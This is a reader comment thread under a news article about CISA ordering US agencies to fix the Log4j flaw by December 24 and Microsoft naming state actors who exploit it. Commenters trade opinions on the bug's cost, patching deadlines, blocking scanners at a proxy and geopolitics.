back to article As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole. Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to …

  1. JohnSheeran

    This certainly looks like the worst I've seen in my career. There is already so much said about it but the amount of time and money this is going to cost us is hard to imagine.

  2. Anonymous Coward

    Shit show

    Most of my webby stuff is behind HA Proxy. I put in a rule to block most naive jndi type GETs after normalisation - they go to a tarpit. I've seen a few requests per day. Perhaps if you look a bit crap and sad then you drop off the radar.

    One was quite persistent and looked like a security research effort (I can't be arsed to follow up). Another is really sad and clearly has a bug or two in their code. The GET tries to create a URL with ${hostName} in it, so they've got their quoting etc screwed up. Another makes the same mistake as the last but the URL is repeated several times in a weird nesting bug.

    The clever kids will no doubt be causing some harm in the near future but there are some comical efforts from the skiddies too.

    1. analoguecomputer

      Re: Shit show

      Blocking "most" "kids and skiddies" sounds like a really good strategy. The problem with Infosec is people just get "arsed" a bit much.

      Do you give lectures? This sounds like a really efficient and cost-effective approach!

      Is this UK-GCHQ inspired? Have you worked for the NHS?

      Get back to us if ever nation states decide to hire grown-arsed adults as part of their cyber offensive strategy!

      1. Anonymous Coward

        Re: Shit show

        "Get back to us if ever nation states" - that's the clever kids I refer to.

        The great thing about running everything inbound www through a proxy is you get to see all sorts of things. I've only given a flavour here. No, of course that's not my sole strategy and I'm just a simple sysadmin.

        I have worked for and on behalf of some quite interesting organisations.

  3. Anonymous Coward
    Anonymous Coward

    "the US government's Cybersecurity and Infrastructure Security Agency tells all federal civilian agencies to take care of CVE-2021-44228 by December 24, 2021. That's quite a tight deadline."

    Tight? Only by government standards. I think our deadline was today.

    1. Yet Another Anonymous coward Silver badge

      You managed to generate all the PowerPoints necessary to launch a cross-department liaison office with a mandate to discuss ways formulating a policy to respond to this - in only one day ?

      We have barely gathered all the logo images of the stakeholders for the title page

  4. Anonymous Coward
    Anonymous Coward

    Jokers, Java sprawl mopped up in a few days across hundreds of thousands of devices. Your having a laugh

    Just installing a later version of Java can take weeks of testing.....

  5. batfink

    Them and everyone else

    Why is it that I find it hard to believe it's only the TLAs of Russia, China and Turkey actively exploiting this?

    If the others aren't, then they're falling down on their jobs.

    1. MrDamage Silver badge

      Re: Them and everyone else

      Because as soon as news of this hole got out, they stopped using and went on to the next one on their list.

      1. Yet Another Anonymous coward Silver badge

        Re: Them and everyone else

        I'm a little out of the loop - my Vidiscreen has been broken.

        Is that Turkey, our staunch NATO ally in the war against the Kurds who are responsible for maintaining all our new F35s?

        Or have we always been at war with Eurasia ?

  6. martinusher Silver badge

    ....and I suppose the Axis of Evil doesn't use web browsers?

    Says it all, really.

    This bug cuts across nations. We might want to ponder why our pols and pundits seem to think that "the usual suspects" will immediately exploit it without it being immediately exploited against them. (As a ransomware delivery tool the answer's obvious -- like bank robbers you go where the money is.)

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like